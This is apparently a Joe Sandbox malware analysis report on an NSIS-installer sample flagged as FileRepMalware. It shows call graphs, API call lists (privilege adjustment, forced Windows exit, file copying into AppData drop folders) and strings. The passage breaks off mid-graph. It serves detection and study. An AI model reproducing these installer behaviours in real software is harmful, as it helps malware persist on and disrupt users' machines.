4437->4439 4438->4435 4439->4435 4441 405df0 WriteFile 4440->4441 4440->4443 4441->4443 4442->4440 4451 403918 4452 403923 4451->4452 4453 403927 4452->4453 4454 40392a GlobalAlloc 4452->4454 4454->4453 3744 401c19 3745 402c15 17 API calls 3744->3745 3746 401c20 3745->3746 3747 402c15 17 API calls 3746->3747 3748 401c2d 3747->3748 3749 401c42 3748->3749 3750 402c37 17 API calls 3748->3750 3751 401c52 3749->3751 3752 402c37 17 API calls 3749->3752 3750->3749 3753 401ca9 3751->3753 3754 401c5d 3751->3754 3752->3751 3756 402c37 17 API calls 3753->3756 3755 402c15 17 API calls 3754->3755 3757 401c62 3755->3757 3758 401cae 3756->3758 3759 402c15 17 API calls 3757->3759 3760 402c37 17 API calls 3758->3760 3761 401c6e 3759->3761 3762 401cb7 FindWindowExW 3760->3762 3763 401c99 SendMessageW 3761->3763 3764 401c7b SendMessageTimeoutW 3761->3764 3765 401cd9 3762->3765 3763->3765 3764->3765 4455 40281b 4456 402821 4455->4456 4457 402829 FindClose 4456->4457 4458 402abf 4456->4458 4457->4458 4459 40149e 4460 4022f1 4459->4460 4461 4014ac PostQuitMessage 4459->4461 4461->4460 3408 4015a3 3409 402c37 17 API calls 3408->3409 3410 4015aa SetFileAttributesW 3409->3410 3411 4015bc 3410->3411 4469 405224 4470 405234 4469->4470 4471 405248 4469->4471 4472 40523a 4470->4472 4481 405291 4470->4481 4473 405250 IsWindowVisible 4471->4473 4477 405267 4471->4477 4475 40422d SendMessageW 4472->4475 4476 40525d 4473->4476 4473->4481 4474 405296 CallWindowProcW 4478 405244 4474->4478 4475->4478 4482 404b7a SendMessageW 4476->4482 4477->4474 4487 404bfa 4477->4487 4481->4474 4483 404bd9 SendMessageW 4482->4483 4484 404b9d GetMessagePos ScreenToClient SendMessageW 4482->4484 4485 404bd1 4483->4485 4484->4485 4486 404bd6 4484->4486 4485->4477 4486->4483 4496 40624c lstrcpynW 4487->4496 4489 404c0d 4497 406193 wsprintfW 4489->4497 4491 404c17 4492 40140b 2 API calls 4491->4492 4493 404c20 4492->4493 4498 40624c lstrcpynW 4493->4498 4495 404c27 4495->4481 4496->4489 4497->4491 4498->4495 3573 40202c 3574 40203e 3573->3574 3584 4020f0 3573->3584 3575 402c37 17 API calls 3574->3575 3576 402045 3575->3576 3578 402c37 17 API calls 3576->3578 3577 401423 24 API calls 3582 40224a 3577->3582 3579 40204e 3578->3579 3580 402064 LoadLibraryExW 3579->3580 3581 402056 GetModuleHandleW 3579->3581 3583 402075 3580->3583 3580->3584 3581->3580 3581->3583 3593 406695 WideCharToMultiByte 3583->3593 3584->3577 3587 402086 3590 401423 24 API calls 3587->3590 3591 402096 3587->3591 3588 4020bf 3589 4052b0 24 API calls 3588->3589 3589->3591 3590->3591 3591->3582 3592 4020e2 FreeLibrary 3591->3592 3592->3582 3594 402080 3593->3594 3595 4066bf GetProcAddress 3593->3595 3594->3587 3594->3588 3595->3594 4499 404c2c GetDlgItem GetDlgItem 4500 404c7e 7 API calls 4499->4500 4508 404e97 4499->4508 4501 404d21 DeleteObject 4500->4501 4502 404d14 SendMessageW 4500->4502 4503 404d2a 4501->4503 4502->4501 4505 404d61 4503->4505 4507 40626e 17 API calls 4503->4507 4504 404f7b 4506 405027 4504->4506 4511 404e8a 4504->4511 4516 404fd4 SendMessageW 4504->4516 4509 4041e1 18 API calls 4505->4509 4512 405031 SendMessageW 4506->4512 4513 405039 4506->4513 4514 404d43 SendMessageW SendMessageW 4507->4514 4508->4504 4519 404b7a 5 API calls 4508->4519 4531 404f08 4508->4531 4510 404d75 4509->4510 4515 4041e1 18 API calls 4510->4515 4517 404248 8 API calls 4511->4517 4512->4513 4523 405052 4513->4523 4524 40504b ImageList_Destroy 4513->4524 4528 405062 4513->4528 4514->4503 4532 404d83 4515->4532 4516->4511 4521 404fe9 SendMessageW 4516->4521 4522 40521d 4517->4522 4518 404f6d SendMessageW 4518->4504 4519->4531 4520 4051d1 4520->4511 4529 4051e3 ShowWindow GetDlgItem ShowWindow 4520->4529 4527 404ffc 4521->4527 4525 40505b GlobalFree 4523->4525 4523->4528 4524->4523 4525->4528 4526 404e58 GetWindowLongW SetWindowLongW 4530 404e71 4526->4530 4538 40500d SendMessageW 4527->4538 4528->4520 4533 40509d 4528->4533 4543 404bfa 4 API calls 4528->4543 4529->4511 4534 404e77 ShowWindow 4530->4534 4535 404e8f 4530->4535 4531->4504 4531->4518 4532->4526 4537 404dd3 SendMessageW 4532->4537 4539 404e52 4532->4539 4541 404e20 SendMessageW 4532->4541 4542 404e0f SendMessageW 4532->4542 4546 4050cb SendMessageW 4533->4546 4549 4050e1 4533->4549 4550 404216 SendMessageW 4534->4550 4551 404216 SendMessageW 4535->4551 4537->4532 4538->4506 4539->4526 4539->4530 4541->4532 4542->4532 4543->4533 4544 4051a7 InvalidateRect 4544->4520 4545 4051bd 4544->4545 4552 404b35 4545->4552 4546->4549 4548 405155 SendMessageW SendMessageW 4548->4549 4549->4544 4549->4548 4550->4511 4551->4508 4555 404a6c 4552->4555 4554 404b4a 4554->4520 4557 404a85 4555->4557 4556 40626e 17 API calls 4558 404ae9 4556->4558 4557->4556 4559 40626e 17 API calls 4558->4559 4560 404af4 4559->4560 4561 40626e 17 API calls 4560->4561 4562 404b0a lstrlenW wsprintfW SetDlgItemTextW 4561->4562 4562->4554 4563 40432f lstrlenW 4564 404350 WideCharToMultiByte 4563->4564 4565 40434e 4563->4565 4565->4564 4566 402a2f 4567 402c15 17 API calls 4566->4567 4568 402a35 4567->4568 4569 402a6c 4568->4569 4570 402885 4568->4570 4572 402a47 4568->4572 4569->4570 4571 40626e 17 API calls 4569->4571 4571->4570 4572->4570 4574 406193 wsprintfW 4572->4574 4574->4570 4575 401a30 4576 402c37 17 API calls 4575->4576 4577 401a39 ExpandEnvironmentStringsW 4576->4577 4578 401a4d 4577->4578 4580 401a60 4577->4580 4579 401a52 lstrcmpW 4578->4579 4578->4580 4579->4580 4581 4046b0 4582 4046dc 4581->4582 4583 4046ed 4581->4583 4642 405892 GetDlgItemTextW 4582->4642 4585 4046f9 GetDlgItem 4583->4585 4588 404758 4583->4588 4587 40470d 4585->4587 4586 4046e7 4589 4064e0 5 API calls 4586->4589 4590 404721 SetWindowTextW 4587->4590 4593 405bc8 4 API calls 4587->4593 4595 40626e 17 API calls 4588->4595 4603 40483c 4588->4603 4640 4049eb 4588->4640 4589->4583 4594 4041e1 18 API calls 4590->4594 4592 404248 8 API calls 4597 4049ff 4592->4597 4605 404717 4593->4605 4598 40473d 4594->4598 4599 4047cc SHBrowseForFolderW 4595->4599 4596 40486c 4600 405c25 18 API calls 4596->4600 4601 4041e1 18 API calls 4598->4601 4602 4047e4 CoTaskMemFree 4599->4602 4599->4603 4604 404872 4600->4604 4606 40474b 4601->4606 4607 405b1d 3 API calls 4602->4607 4603->4640 4644 405892 GetDlgItemTextW 4603->4644 4645 40624c lstrcpynW 4604->4645 4605->4590 4608 405b1d 3 API calls 4605->4608 4643 404216 SendMessageW 4606->4643 4610 4047f1 4607->4610 4608->4590 4613 404828 SetDlgItemTextW 4610->4613 4617 40626e 17 API calls 4610->4617 4612 404751 4615 406626 5 API calls 4612->4615 4613->4603 4614 404889 4616 406626 5 API calls 4614->4616 4615->4588 4624 404890 4616->4624 4618 404810 lstrcmpiW 4617->4618 4618->4613 4621 404821 lstrcatW 4618->4621 4619 4048d1 4646 40624c lstrcpynW 4619->4646 4621->4613 4622 4048d8 4623 405bc8 4 API calls 4622->4623 4625 4048de GetDiskFreeSpaceW 4623->4625 4624->4619 4628 405b69 2 API calls 4624->4628 4630 404929 4624->4630 4627 404902 MulDiv 4625->4627 4625->4630 4627->4630 4628->4624 4629 40499a 4632 4049bd 4629->4632 4634 40140b 2 API calls 4629->4634 4630->4629 4631 404b35 20 API calls 4630->4631 4633 404987 4631->4633 4647 404203 KiUserCallbackDispatcher 4632->4647 4636 40499c SetDlgItemTextW 4633->4636 4637 40498c 4633->4637 4634->4632 4636->4629 4639 404a6c 20 API calls 4637->4639 4638 4049d9 4638->4640 4641 404609 SendMessageW 4638->4641 4639->4629 4640->4592 4641->4640 4642->4586 4643->4612 4644->4596 4645->4614 4646->4622 4647->4638 4653 401db3 GetDC 4654 402c15 17 API calls 4653->4654 4655 401dc5 GetDeviceCaps MulDiv ReleaseDC 4654->4655 4656 402c15 17 API calls 4655->4656 4657 401df6 4656->4657 4658 40626e 17 API calls 4657->4658 4659 401e33 CreateFontIndirectW 4658->4659 4660 40258c 4659->4660 4661 401735 4662 402c37 17 API calls 4661->4662 4663 40173c SearchPathW 4662->4663 4664 401757 4663->4664 4665 402835 4666 40283d 4665->4666 4667 402841 FindNextFileW 4666->4667 4668 402853 4666->4668 4667->4668 4669 40289a 4667->4669 4671 40624c lstrcpynW 4669->4671 4671->4668 4672 4014b8 4673 4014be 4672->4673 4674 401389 2 API calls 4673->4674 4675 4014c6 4674->4675 4676 402ab8 InvalidateRect 4677 402abf 4676->4677 3780 40333d SetErrorMode GetVersion 3781 40337c 3780->3781 3782 403382 3780->3782 3783 406626 5 API calls 3781->3783 3784 4065b6 3 API calls 3782->3784 3783->3782 3785 403398 lstrlenA 3784->3785 3785->3782 3786 4033a8 3785->3786 3787 406626 5 API calls 3786->3787 3788 4033af 3787->3788 3789 406626 5 API calls 3788->3789 3790 4033b6 3789->3790 3791 406626 5 API calls 3790->3791 3792 4033c2 #17 OleInitialize SHGetFileInfoW 3791->3792 3871 40624c lstrcpynW 3792->3871 3795 40340e GetCommandLineW 3872 40624c lstrcpynW 3795->3872 3797 403420 GetModuleHandleW 3798 403438 3797->3798 3799 405b4a CharNextW 3798->3799 3800 403447 CharNextW 3799->3800 3801 403571 GetTempPathW 3800->3801 3811 403460 3800->3811 3873 40330c 3801->3873 3803 403589 3804 4035e3 DeleteFileW 3803->3804 3805 40358d GetWindowsDirectoryW lstrcatW 3803->3805 3883 402ec1 GetTickCount GetModuleFileNameW 3804->3883 3806 40330c 12 API calls 3805->3806 3809 4035a9 3806->3809 3807 405b4a CharNextW 3807->3811 3809->3804 3812 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3809->3812 3810 4035f7 3818 405b4a CharNextW 3810->3818 3855 40369a 3810->3855 3866 4036aa 3810->3866 3811->3807 3814 40355c 3811->3814 3816 40355a 3811->3816 3815 40330c 12 API calls 3812->3815 3967 40624c lstrcpynW 3814->3967 3821 4035db 3815->3821 3816->3801 3822 403616 3818->3822 3821->3804 3821->3866 3829 403674 3822->3829 3830 4036da 3822->3830 3823 4037e4 3826 403868 ExitProcess 3823->3826 3827 4037ec GetCurrentProcess OpenProcessToken 3823->3827 3824 4036c4 3825 4058ae MessageBoxIndirectW 3824->3825 3831 4036d2 ExitProcess 3825->3831 3832 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3827->3832 3833 403838 3827->3833 3834 405c25 18 API calls 3829->3834 3835 405819 5 API calls 3830->3835 3832->3833 3836 406626 5 API calls 3833->3836 3837 403680 3834->3837 3838 4036df lstrcatW 3835->3838 3839 40383f 3836->3839 3837->3866 3968 40624c lstrcpynW 3837->3968 3841 4036f0 lstrcatW 3838->3841 3842 4036fb lstrcatW lstrcmpiW 3838->3842 3840 403854 ExitWindowsEx 3839->3840 3843 403861 3839->3843 3840->3826 3840->3843 3841->3842 3845 403717 3842->3845 3842->3866 3846 40140b 2 API calls 3843->3846 3848 403723 3845->3848 3849 40371c 3845->3849 3846->3826 3847 40368f 3969 40624c lstrcpynW 3847->3969 3851 4057fc 2 API calls 3848->3851 3850 40577f 4 API calls 3849->3850 3853 403721 3850->3853 3854 403728 SetCurrentDirectoryW 3851->3854 3853->3854 3856 403743 3854->3856 3857 403738 3854->3857 3911 40395a 3855->3911 3978 40624c lstrcpynW 3856->3978 3977 40624c lstrcpynW 3857->3977 3860 40626e 17 API calls 3861 403782 DeleteFileW 3860->3861 3862 40378f CopyFileW 3861->3862 3868 403751 3861->3868 3862->3868 3863 4037d8 3864 406012 36 API calls 3863->3864 3864->3866 3865 406012 36 API calls 3865->3868 3970 403880 3866->3970 3867 40626e 17 API calls 3867->3868 3868->3860 3868->3863 3868->3865 3868->3867 3869 405831 2 API calls 3868->3869 3870 4037c3 CloseHandle 3868->3870 3869->3868 3870->3868 3871->3795 3872->3797 3874 4064e0 5 API calls 3873->3874 3876 403318 3874->3876 3875 403322 3875->3803 3876->3875 3877 405b1d 3 API calls 3876->3877 3878 40332a 3877->3878 3879 4057fc 2 API calls 3878->3879 3880 403330 3879->3880 3979 405d6d 3880->3979 3983 405d3e GetFileAttributesW CreateFileW 3883->3983 3885 402f01 3886 402f11 3885->3886 3984 40624c lstrcpynW 3885->3984 3886->3810 3888 402f27 3889 405b69 2 API calls 3888->3889 3890 402f2d 3889->3890 3985 40624c lstrcpynW 3890->3985 3892 402f38 GetFileSize 3893 402f4f 3892->3893 3908 403034 3892->3908 3893->3886 3896 4032df ReadFile 3893->3896 3898 4030a0 3893->3898 3906 402e5d 6 API calls 3893->3906 3893->3908 3895 40303d 3895->3886 3897 40306d GlobalAlloc 3895->3897 3998 4032f5 SetFilePointer 3895->3998 3896->3893 3997 4032f5 SetFilePointer 3897->3997 3902 402e5d 6 API calls 3898->3902 3901 403088 3904 4030fa 35 API calls 3901->3904 3902->3886 3903 403056 3905 4032df ReadFile 3903->3905 3909 403094 3904->3909 3907 403061 3905->3907 3906->3893 3907->3886 3907->3897 3986 402e5d 3908->3986 3909->3886 3909->3909 3910 4030d1 SetFilePointer 3909->3910 3910->3886 3912 406626 5 API calls 3911->3912 3913 40396e 3912->3913 3914 403974 3913->3914 3915 403986 3913->3915 4007 406193 wsprintfW 3914->4007 3916 40611a 3 API calls 3915->3916 3917 4039b6 3916->3917 3919 4039d5 lstrcatW 3917->3919 3921 40611a 3 API calls 3917->3921 3920 403984 3919->3920 3999 403c30 3920->3999 3921->3919 3924 405c25 18 API calls 3927 403a07 3924->3927 3925 403a9b 3926 405c25 18 API calls 3925->3926 3928 403aa1 3926->3928 3927->3925 3929 40611a 3 API calls 3927->3929 3931 403ab1 LoadImageW 3928->3931 3932 40626e 17 API calls 3928->3932 3930 403a39 3929->3930 3930->3925 3935 403a5a lstrlenW 3930->3935 3938 405b4a CharNextW 3930->3938 3933 403b57 3931->3933 3934 403ad8 RegisterClassW 3931->3934 3932->3931 3937 40140b 2 API calls 3933->3937 3936 403b0e SystemParametersInfoW CreateWindowExW 3934->3936 3966 403b61 3934->3966 3939 403a68 lstrcmpiW 3935->3939 3940 403a8e 3935->3940 3936->3933 3941 403b5d 3937->3941 3942 403a57 3938->3942 3939->3940 3943 403a78 GetFileAttributesW 3939->3943 3944 405b1d 3 API calls 3940->3944 3946 403c30 18 API calls 3941->3946 3941->3966 3942->3935 3945 403a84 3943->3945 3947 403a94 3944->3947 3945->3940 3948 405b69 2 API calls 3945->3948 3949 403b6e 3946->3949 4008 40624c lstrcpynW 3947->4008 3948->3940 3951 403b7a ShowWindow 3949->3951 3952 403bfd 3949->3952 3954 4065b6 3 API calls 3951->3954 3953 405383 5 API calls 3952->3953 3956 403c03 3953->3956 3955 403b92 3954->3955 3957 403ba0 GetClassInfoW 3955->3957 3960 4065b6 3 API calls 3955->3960 3958 403c07 3956->3958 3959 403c1f 3956->3959 3962 403bb4 GetClassInfoW RegisterClassW 3957->3962 3963 403bca DialogBoxParamW 3957->3963 3965 40140b 2 API calls 3958->3965 3958->3966 3961 40140b 2 API calls 3959->3961 3960->3957 3961->3966 3962->3963 3964 40140b 2 API calls 3963->3964 3964->3966 3965->3966 3966->3866 3967->3816 3968->3847 3969->3855 3971 403898 3970->3971 3972 40388a CloseHandle 3970->3972 4010 4038c5 3971->4010 3972->3971 3975 40595a 67 API calls 3976 4036b3 OleUninitialize 3975->3976 3976->3823 3976->3824 3977->3856 3978->3868 3980 405d7a GetTickCount GetTempFileNameW 3979->3980 3981 405db0 3980->3981 3982 40333b 3980->3982 3981->3980 3981->3982 3982->3803 3983->3885 3984->3888 3985->3892 3987 402e66 3986->3987 3988 402e7e 3986->3988 3989 402e76 3987->3989 3990 402e6f DestroyWindow 3987->3990 3991 402e86 3988->3991 3992 402e8e GetTickCount 3988->3992 3989->3895 3990->3989 3993 406662 2 API calls 3991->3993 3994 402e9c CreateDialogParamW ShowWindow 3992->3994 3995 402ebf 3992->3995 3996 402e8c 3993->3996 3994->3995 3995->3895 3996->3895 3997->3901 3998->3903 4000 403c44 3999->4000 4009 406193 wsprintfW 4000->4009 4002 403cb5 4003 403ce9 18 API calls 4002->4003 4005 403cba 4003->4005 4004 4039e5 4004->3924 4005->4004 4006 40626e 17 API calls 4005->4006 4006->4005 4007->3920 4008->3925 4009->4002 4012 4038d3 4010->4012 4011 40389d 4011->3975 4012->4011 4013 4038d8 FreeLibrary GlobalFree 4012->4013 4013->4011 4013->4013

                                                                            Executed Functions

                                                                            Function 0040333D Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 412stringfilecomCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403360
                                                                            • GetVersion.KERNEL32 ref: 00403366
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                            • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                            • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                            • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                            • ExitProcess.KERNEL32 ref: 004036D4
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                            • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                            • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                                                            • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                            • ExitProcess.KERNEL32 ref: 0040387A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2488574733-1648080515
                                                                            • Opcode ID: e7c14eb664e5024c42dfa4d2f8ce4aee3ce13a771c1e87f2ab963189daa35b61
                                                                            • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                            • Opcode Fuzzy Hash: e7c14eb664e5024c42dfa4d2f8ce4aee3ce13a771c1e87f2ab963189daa35b61
                                                                            • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                            Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 162 4054f5-4054f8 140->162 163 4054d9-4054f3 SendMessageW * 2 140->163 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 146 4055f5-4055ff 144->146 147 4055d9-4055df 144->147 151 405601-405607 146->151 152 405655-405659 146->152 149 4055e1-4055f0 ShowWindow * 2 call 404216 147->149 150 40561a-405623 call 404248 147->150 149->146 159 405628-40562c 150->159 156 405609-405615 call 4041ba 151->156 157 40562f-40563f ShowWindow 151->157 152->150 154 40565b-405661 152->154 154->150 164 405663-405676 SendMessageW 154->164 156->150 160 405641-40564a call 4052b0 157->160 161 40564f-405650 call 4041ba 157->161 160->161 161->152 168 405508-40551f call 4041e1 162->168 169 4054fa-405506 SendMessageW 162->169 163->162 170 405778-40577a 164->170 171 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 164->171 178 405521-405535 ShowWindow 168->178 179 405555-405576 GetDlgItem SendMessageW 168->179 169->168 170->159 176 4056a9-4056b9 GetWindowRect 171->176 177 4056bc-4056d1 TrackPopupMenu 171->177 176->177 177->170 181 4056d7-4056ee 177->181 182 405544 178->182 183 405537-405542 ShowWindow 178->183 179->170 180 40557c-405594 SendMessageW * 2 179->180 180->170 185 4056f3-40570e SendMessageW 181->185 184 40554a-405550 call 404216 182->184 183->184 184->179 185->185 186 405710-405733 OpenClipboard EmptyClipboard 